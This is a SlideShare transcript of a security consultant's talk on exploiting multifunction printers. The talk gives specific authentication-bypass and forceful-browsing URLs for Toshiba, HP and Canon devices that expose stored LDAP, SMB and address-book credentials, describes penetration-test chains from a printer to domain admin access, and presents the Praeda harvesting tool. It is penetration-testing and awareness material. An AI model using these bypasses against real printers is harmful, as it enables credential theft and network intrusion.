Exploiting Vulnerabilities in Multifunction Printers

12,999 views

Published on

403 Labs Consultant Pete Arzamendi discuss the possibilities of exploiting vulnerabilities in multifunction printers.

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
12,999
On SlideShare
0
From Embeds
0
Number of Embeds
237
Actions
Shares
0
Downloads
109
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Exploiting Vulnerabilities in Multifunction Printers

  1. 1. Exploiting vulnerabilities in Multifunction Printers<br />Pete Arzamendi<br />Consultant, 403 Labs, LLC<br />
  2. 2. Introduction<br />Pete Arzamendi<br /><ul><li>Consultant at 403 Labs
  3. 3. Both a Qualified Security Assessor (QSA) and a Payment Application Qualified Security Assessor (PA-QSA) for the Payment Card Industry (PCI)
  4. 4. Former packet monkey, with over 10 years of experience in the Information Technology field
  5. 5. Worked with small, medium businesses, local and state authorities on computer forensic cases and security assessments
  6. 6. Hobbies include malware analysis and vulnerably research
  7. 7. Member of the foofus.net team</li></li></ul><li>Introduction<br />403 Labs, LLC<br /><ul><li>Full-service information security and compliance consulting firm headquartered in Milwaukee with additional offices in Chicago and San Francisco
  8. 8. Experts in the Payment Card Industry (PCI)
  9. 9. Qualified Security Assessor (QSA)
  10. 10. Payment Application Qualified Security Assessor (PA-QSA)
  11. 11. Approved Scanning Vendor (ASV)
  12. 12. PCI Forensics Investigator (PFI) (just approved, expect to be listed shortly)
  13. 13. Penetration testing, including web applications
  14. 14. Experienced in handling computer forensic investigations</li></li></ul><li>Agenda<br /><ul><li>History of printers
  15. 15. MFP functions and features
  16. 16. MFP flaws and vulnerabilities
  17. 17. Leveraging MFP during penetration testing
  18. 18. Development of an automated harvesting tool ‘PRAEDA’
  19. 19. Q/A</li></li></ul><li>Terms and jargon<br /><ul><li>LDAP: The Lightweight Directory Access Protocol is an application protocol for reading and editing directories , A directory in this sense is an organized set of records: for example, a telephone directory is an alphabetical list of persons and organizations with an address and phone number in each "record".
  20. 20. SMB: Server Message Block (SMB), mainly used to provide shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.
  21. 21. SMTP: Simple Mail Transfer Protocol (SMTP) is an Internet standard for electronic mail (e-mail) transmission .
  22. 22. AD: Active Directory (AD) is a directory service created by Microsoft. Active Directory allows administrators to assign policies, deploy and update software. Active Directory networks can vary from a small installation with a few computers, users and printers to tens of thousands of users, many different network domains and large server farms spanning many geographical locations.</li></li></ul><li>History of Multifunction Printers<br /><ul><li>Gary Starkweather is credited with inventing the Laser Printer at Xerox in 1969
  23. 23. The first multifunction printer/copier, the "Xerox Printer 100," 1987
  24. 24. March 1991 – The HP LaserJet IIISi, the world’s first networked printer
  25. 25. The first true multifunction printer/fax/copier were introduced in the early 1990s</li></ul>In 2011 you really can’t buy just a printer<br />
  26. 26. MFP functions and features<br />
  27. 27. MFP functions and features <br /><ul><li>Looking for features and functions that can be leveraged to gain information that could be leveraged in attacking other systems
  28. 28. Email
  29. 29. Server settings
  30. 30. Address books
  31. 31. Faxing
  32. 32. Contact info
  33. 33. User name
  34. 34. Address books</li></li></ul><li>MFP functions and features<br /><ul><li>Scanning
  35. 35. Windows authentication
  36. 36. System
  37. 37. Users
  38. 38. FTP authentication
  39. 39. LDAP
  40. 40. Access credentials
  41. 41. Logging
  42. 42. User names
  43. 43. Remote retrieval of print, scan or fax jobs</li></li></ul><li>Toshiba functions and features<br />
  44. 44. Toshiba functions and features<br />
  45. 45. Toshiba functions and features<br />Password<br />Network Path<br />Username<br />
  46. 46. Canon functions and features <br />
  47. 47. Canon functions and features <br />
  48. 48. Canon functions and features <br />
  49. 49. Canon functions and features <br />
  50. 50. HP functions and features <br />
  51. 51. HP functions and features <br />HP M4345, 9250, CM6040<br />
  52. 52. HP functions and features <br />
  53. 53. MFP flaws and vulnerabilities<br />
  54. 54. MFP flaws and vulnerabilities<br />Security Bypass <br /><ul><li>Various brands and models suffer from a vulnerability allowing bypass of security authentication</li></ul>Example: Toshiba e-STUDIO /TopAccess/Administrator/Setup/ScanToFile/List.htm<br />
  55. 55. MFP flaws and vulnerabilities<br />/TopAccess//Administrator/Setup/ScanToFile/List.htm<br />An extra slash / and full access is allowed<br />
  56. 56. MFP flaws and vulnerabilities<br />Security Bypass <br />Example: Home/Office HP Officejet<br />/index.htm?cat=info&page=faxAddrBook1<br />
  57. 57. MFP flaws and vulnerabilities<br />Security Bypass <br />/index.htm?cat=info&page=faxAddrBook1<br />An extra page=and full access is allowed<br />/index.htm?cat=info&page=page=faxAddrBook1<br />
  58. 58. MFP flaws and vulnerabilities<br />Forceful Browsing<br /><ul><li>Gain access to web pages and files by just knowing the correct URL path
  59. 59. Typically find that a number of devices, printers and network appliances correctly secure cgi, htm and html extension files, but allow unauthenticated access to other file types</li></li></ul><li>MFP flaws and vulnerabilities<br />Forceful Browsing <br />Canon imageRUNNER<br />Export address books<br />http//target:8080/abook.ldif?AID=1&ACLS=1<br /><ul><li>AID= can be incremented to download different address books
  60. 60. ACLS=1 on imageRUNNER 3000 series
  61. 61. ACLS=2 on imageRUNNER 4000 & 5000 series
  62. 62. Extract user names
  63. 63. Could also contain password
  64. 64. Accessible host</li></li></ul><li>MFP flaws and vulnerabilities<br />Forceful Browsing<br /><ul><li>Canon imageRUNNER
  65. 65. Export additional functions http://target:8080/usermode.umd
  66. 66. Usermode.umdis a data file containing printer configuration data in plain text</li></li></ul><li>MFP flaws and vulnerabilities<br /><ul><li>Information leak - A look at a few examples
  67. 67. Toshiba e-STUDIO
  68. 68. Canon imageRUNNER
  69. 69. HP MFP</li></li></ul><li>MFP flaws and vulnerabilities<br />Toshiba Information Leak <br />Just because the web form shows ●●●●●●●● <br />doesn’t mean it’s truly hidden<br />Not uncommon to find data viewable within <br />the web source as plain text<br />
  70. 70. MFP flaws and vulnerabilities<br />CanonInformation Leak<br />Want to bet this is also viewable in the source?<br />Although not directly found in the Password: value field, <br />it was still found within a hidden input tag <br />
  71. 71. MFP flaws and vulnerabilities<br />HP Information Leak<br />value=“ayz123”<br />Once again just need to examine the property<br />of the password field<br />
  72. 72. What thebad guys are doing…<br />Leveraging MFP vulnerabilities<br />
  73. 73. Leveraging MFP during <br />penetration testing<br /><ul><li>HP to domain admin access
  74. 74. HP Color LaserJet CP4025
  75. 75. Extract users’ names from color job log
  76. 76. User with weak password
  77. 77. Access to workstations
  78. 78. Domain admin token</li></li></ul><li>Leveraging MFP during <br />penetration testing<br /><ul><li>Toshiba to payroll
  79. 79. Toshiba e-STUDIO
  80. 80. Extract password from scan-to-file function
  81. 81. Gain access to AD domain
  82. 82. Gain access to a number of folders/files/shares
  83. 83. Access to one special file share “Payroll backup”</li></li></ul><li>Leveraging MFP during <br />penetration testing<br /><ul><li>Canon to domain controller
  84. 84. Canon imageRUNNER
  85. 85. Extract LDAP settings
  86. 86. Enumerate domain user info
  87. 87. Remote Desktop access to all servers</li></li></ul><li>Leveraging MFP during <br />penetration testing<br /><ul><li>Fax to pwned
  88. 88. OfficeBridge – Fax system
  89. 89. First device we found credentials stored on – This is what got this project started
  90. 90. Extract password from LDAP settings
  91. 91. Account was domain admin account</li></li></ul><li>01/27/11<br />
  92. 92. Automating the process<br />
  93. 93. Automated harvesting Praeda<br />What is Praeda?<br /><ul><li>Latin for robber, plunderer
  94. 94. A tool for the purpose of gathering information from network appliances through their web management interfaces
  95. 95. Printers
  96. 96. Network appliances
  97. 97. Beta version written in perl
  98. 98. Goal was to create a simplistic tool that was modular</li></li></ul><li>Automated harvesting Praeda<br />
  99. 99. Automated harvesting Praeda<br />DataFile Structure<br />P000005|HP Color LaserJet CP3525 Printers|HP-ChaiSOE/1.0|MP0002<br />P000006|HP Color LaserJet CP3505 Printers|HP-ChaiSOE/1.0|MP0002|<br />P000007||Canon Http Server 2.10|MP0003|MP0004|MP0005<br />P000008||Canon Http Server 2.11|MP0003|MP0004|MP0005<br />P000009|Home - Phaser 7750GX|Allegro-Software-RomPager/4.10|MP0006<br />P000010|Unauthorized|Spyglass_MicroServer/2.01FC1|MP0006<br />P000011|Principal|Spyglass_MicroServer/2.01FC1|MP0006<br />P000012|Home|Spyglass_MicroServer/2.01FC1|MP0006<br />P000013|Home - Phaser 6360DT|Allegro-Software-RomPager/4.34|MP0006<br />P000014|TopAccess|TOSHIBA TEC CORPORATION|MP0007<br />
  100. 100. Automated harvesting Praeda<br /><ul><li>We presently enumerate data from a dozen or more different printer types/versions
  101. 101. Plan is to grow this to cover as many printers as we can find
  102. 102. Looking for other simple methods for identifying printer types, present process involves querying web interface for:
  103. 103. Title page
  104. 104. Server type
  105. 105. Researching encryption methods used by some vendors for backup and clone process outputs
  106. 106. HP
  107. 107. Xerox
  108. 108. Looking into migrating code to Ruby – early stages of conversion started</li></li></ul><li>Questions about Praeda<br />Pete Arzamendi<br />bokojan@foofus.net<br />DeralHeiland<br />percX@foofus.net<br />Beta version of Praeda available at<br />www.foofus.net<br />
  109. 109. Contact Information<br />Pete Arzamendi<br />Consultant<br />403 Labs, LLC<br />parzamendi@403labs.com<br />877.403.LABS<br />www.403labs.com<br />

×